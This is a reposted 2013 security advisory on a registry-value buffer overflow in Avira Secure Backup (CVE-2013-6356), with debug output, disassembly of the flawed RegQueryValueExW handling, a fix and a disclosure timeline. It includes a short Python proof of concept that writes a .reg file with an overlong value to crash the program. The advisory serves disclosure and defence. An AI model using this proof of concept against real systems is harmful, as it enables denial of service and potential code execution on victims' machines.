首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Avira Secure Backup 1.0.0.1 Build 3616 Buffer Overflow Vulnerability
来源:http://www.rcesecurity.com 作者:Ahrens 发布时间:2013-11-18  
1. ADVISORY INFORMATION
-----------------------
Product:        Avira Secure Backup
Vendor URL:     www.avira.com
Type:           Improper Restriction of Operations within the Bounds of
a Memory Buffer [CWE-119]
Date found:     2013-10-30
Date published: 2013-11-16
CVSSv2 Score:   4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            CVE-2013-6356
   
   
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
   
   
3. VERSIONS AFFECTED
--------------------
Avira Secure Backup v1.0.0.1 Build 3616
   
   
4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Avira Secure
Backup v1.0.0.1 Build 3616.
   
The application loads the values of the Registry Keys
"AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from
"HKEY_CURRENT_USER\Software\Avira Secure Backup" on startup but does not
properly validate the length of the fetched values before using them in
the further application context, which leads to a buffer overflow
condition with possible persistent code execution. 
   
The application queries the values via a RegQueryValueExW call and a
fixed buffer pointer (lpData) and a fixed buffer size pointer
(lpcbData). If the input string size is greater than the predefined
size, the application uses a second RegQueryValueExW call with the new
buffer size set to the length of the input string, but reuses the
original buffer pointer (lpData), which has not been resized. This
results in overwriting memory space inlcuding SEH - records.
   
An attacker needs to force the victim to import an arbitrary .reg file
in order to exploit the vulnerability. Successful exploits can allow
attackers to execute arbitrary code with the privileges of the user
running the application. Failed exploits will result in a
denial-of-service condition. The attack scenario is persistent, because
the code is executed as long as the manipulated values are loaded into
the Registry. 
   
   
5. DEBUG INFORMATION
--------------------
Call stack of main thread
Address    Returns to   Procedure / arguments       Called
from                  
0012EB48   77DA6F87     <JMP.&ntdll.memmove>        ADVAPI32.77DA6F82
0012EB4C   0012ECBC       dest = 0012ECBC
0012EB50   0015760C       src = 0015760C
0012EB54   00002712       n = 2712 (10002.)
0012EC28   77DA708B     ADVAPI32.77DA6E02           ADVAPI32.77DA7086
0012EC60   0043F15D     Includes ADVAPI32.77DA708B  Avira_Se.0043F15B
0012EC9C   0043F3F8     Avira_Se.0043F0D2           Avira_Se.0043F3F3
0012F5B4   00CC00CC     *** CORRUPT ENTRY ***
   
The vulnerable code part of Avira Secure Backup.exe: 
0043F0D2  PUSH EBP
0043F0D3  MOV EBP,ESP
0043F0D5  SUB ESP,10
0043F0D8  PUSH EBX
0043F0D9  PUSH ESI
0043F0DA  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; 
ADVAPI32.RegOpenKeyExW
0043F0E0  PUSH EDI
0043F0E1  LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  PUSH EAX                                 ; /pHandle
0043F0E5  PUSH 20019                               ; |Access
0043F0EA  XOR EBX,EBX                              ; |
0043F0EC  PUSH EBX                                 ; |Reserved => 0
0043F0ED  PUSH DWORD PTR SS:[EBP+C]                ; |Subkey
0043F0F0  MOV BYTE PTR SS:[EBP-1],BL               ; |
0043F0F3  PUSH DWORD PTR SS:[EBP+8]                ; |hKey
0043F0F6  MOV DWORD PTR SS:[EBP-C],820             ; |
0043F0FD  CALL ESI                                 ; \RegOpenKeyExW
0043F0FF  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; 
ADVAPI32.RegQueryValueExW
0043F105  TEST EAX,EAX
0043F107  JNZ SHORT Avira_Se.0043F133
0043F109  LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  PUSH EAX                                 ; /pBufSize
0043F10D  PUSH DWORD PTR SS:[EBP+14]               ; |Buffer
0043F110  LEA EAX,DWORD PTR SS:[EBP-10]            ; |
0043F113  PUSH EAX                                 ; |pValueType
0043F114  PUSH EBX                                 ; |Reserved => NULL
0043F115  PUSH DWORD PTR SS:[EBP+10]               ; |ValueName
0043F118  PUSH DWORD PTR SS:[EBP-8]                ; |hKey
0043F11B  CALL EDI                                 ; \RegQueryValueExW
0043F11D  TEST EAX,EAX 
0043F11F  JNZ SHORT Avira_Se.0043F125
0043F121  MOV BYTE PTR SS:[EBP-1],1
0043F125  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F128  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F12E  CMP BYTE PTR SS:[EBP-1],BL
0043F131  JNZ SHORT Avira_Se.0043F16E
0043F133  LEA EAX,DWORD PTR SS:[EBP-8]
0043F136  PUSH EAX
0043F137  PUSH 20119
0043F13C  PUSH EBX
0043F13D  PUSH DWORD PTR SS:[EBP+C]
0043F140  PUSH DWORD PTR SS:[EBP+8]
0043F143  CALL ESI 
0043F145  TEST EAX,EAX
0043F147  JNZ SHORT Avira_Se.0043F16E
0043F149  LEA EAX,DWORD PTR SS:[EBP-C]
0043F14C  PUSH EAX
0043F14D  PUSH DWORD PTR SS:[EBP+14]
0043F150  LEA EAX,DWORD PTR SS:[EBP-10]
0043F153  PUSH EAX
0043F154  PUSH EBX
0043F155  PUSH DWORD PTR SS:[EBP+10]
0043F158  PUSH DWORD PTR SS:[EBP-8]
0043F15B  CALL EDI 
0043F15D  TEST EAX,EAX
0043F15F  JNZ SHORT Avira_Se.0043F165
0043F161  MOV BYTE PTR SS:[EBP-1],1
0043F165  PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F168  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F16E  XOR EAX,EAX
0043F170  CMP BYTE PTR SS:[EBP-1],BL
0043F173  POP EDI
0043F174  POP ESI
0043F175  SETNE AL
0043F178  POP EBX
0043F179  LEAVE
0043F17A  RETN
   
   
6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:
   
#!/usr/bin/python
file="poc.reg"
   
junk1="\xCC" * 1240
   
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n"
poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""
   
try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";
   
   
7. SOLUTION
-----------
Update to v1.0.0.2 Build 3630 or later
   
   
8. REPORT TIMELINE
------------------
2013-10-30: Discovery of the vulnerability
2013-11-03: RCE Security sends first notification to vendor via mail 
            with disclosure date set to 18. November 2013
2013-11-03: MITRE assigns CVE-2013-6356 for this issue
2013-11-04: Vendor ACKs the vulnerability
2013-11-10: RCE Security asks for a status
2013-11-11: Vendor expects to receive a fix the same day
2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
2013-11-16: Coordinated Disclosure
   
   
9. REFERENCES
-------------
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD 10 nand Driver IOCTL K
·Linux Kernel bt8xx Video Drive
·FreeBSD 10 qlxge/qlxgbe Driver
·DeepOfix 3.3 SMTP Authenticati
·Supermicro Onboard IPMI close_
·DesktopCentral AgentLogUpload
·Windows SYSTEM Escalation Via
·Light Alloy 4.7.3 (.m3u) - SEH
·Dahua DVR Authentication Bypas
·ALLPlayer 5.7 (.m3u) - SEH Buf
·Watermark Master v2.2.23 .wsty
·Boilsoft RM TO MP3 Converter 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved